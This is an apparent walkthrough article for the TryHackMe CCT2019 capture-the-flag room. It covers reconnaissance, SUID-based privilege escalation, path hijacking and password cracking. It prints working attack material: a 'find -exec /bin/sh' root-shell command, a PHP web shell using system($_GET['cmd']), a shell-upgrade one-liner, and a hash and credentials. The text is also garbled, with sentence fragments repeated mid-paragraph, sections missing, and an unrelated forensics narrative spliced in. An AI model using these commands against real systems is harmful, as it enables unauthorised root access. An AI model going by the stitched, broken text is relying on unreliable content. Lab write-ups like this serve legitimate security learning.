Tryhackme Cct2019

In the world of cybersecurity, theory can only take you so far. To truly understand how attacks work—and more importantly, how to defend against them—you need hands-on experience. This is where platforms like TryHackMe shine, offering gamified, real-world network environments for students and professionals alike.

One room that consistently challenges and educates users is the TryHackMe CCT2019 room. Named after the Circle City Con 2019 (a prominent Indianapolis-based hacker conference), this room is a CTF (Capture The Flag) style challenge that tests a wide range of skills: from reconnaissance and web exploitation to privilege escalation and password cracking.

If you are looking to move beyond "easy" boxes and into intermediate/advanced territory, tryhackme cct2019 is your next milestone. This article will break down everything you need to know: the objectives, the step-by-step methodology, the tools required, and the key takeaways.

This track was designed for those who had just started their journey. It focused on fundamental skills essential for any security analyst or penetration tester:

For those interested in the investigative side of security, CCT2019 offered a solid Forensics track. This wasn't about hacking into machines, but rather understanding what happened after an incident. tryhackme cct2019

This is the core challenge of tryhackme cct2019. You have a shell, but you can't read root.txt. Here is the typical escalation vector:

Step A: Find SUID Binaries Run:

find / -perm -4000 2>/dev/null

Look for unusual binaries that aren't standard (e.g., /usr/bin/zip, /usr/bin/find, or a custom binary).

Step B: GTFOBins to the Rescue If you see /usr/bin/find, check GTFOBins. The find command with SUID allows you to execute commands as root. In the world of cybersecurity, theory can only

/usr/bin/find . -exec /bin/sh \; -quit

This spawns a root shell.

Alternative Vector (Path Hijacking): Sometimes the room uses a custom script that calls a system command without an absolute path (e.g., service apache2 restart instead of /usr/sbin/service). If you can write to a directory earlier in $PATH, you can create a malicious binary named service that spawns a shell.

Further enumeration of the web server (or using tools like wfuzz or gobuster with larger wordlists) uncovers a file: /development/hash.txt.

Contents of hash.txt:

5966b3aed20b485fea9b33c6721f4150
  • First flag located in /root/flag1.txt.

    • Using elf:workshop2019, you log into SSH. You’re now on the system as a low-privileged elf. But the attacker wasn’t here yet—they used the same credentials to upload a malicious PHP script via the inventory portal’s file upload feature.

    You find the script in /var/www/html/uploads/shell.php. It’s a simple web shell:
    <?php system($_GET['cmd']); ?>

    This is how the attacker first executed commands as www-data.

    To succeed in this room, you should be comfortable with: This track was designed for those who had

    | Tool | Purpose | | :--- | :--- | | Nmap | Port scanning & service detection. | | Gobuster / Dirb | Web directory brute-forcing. | | Burp Suite / Curl | Intercepting/modifying web requests for SQLi or Command Inj. | | Netcat (nc) | Reverse shell listener. | | Python/Perl | Upgrading to a TTY shell (python3 -c 'import pty;pty.spawn("/bin/bash")'). | | LinPEAS / LinEnum | Automated privilege escalation script (optional, but helpful). | | John the Ripper | Cracking database password hashes. | | GTFOBins | Web reference for SUID exploitation. |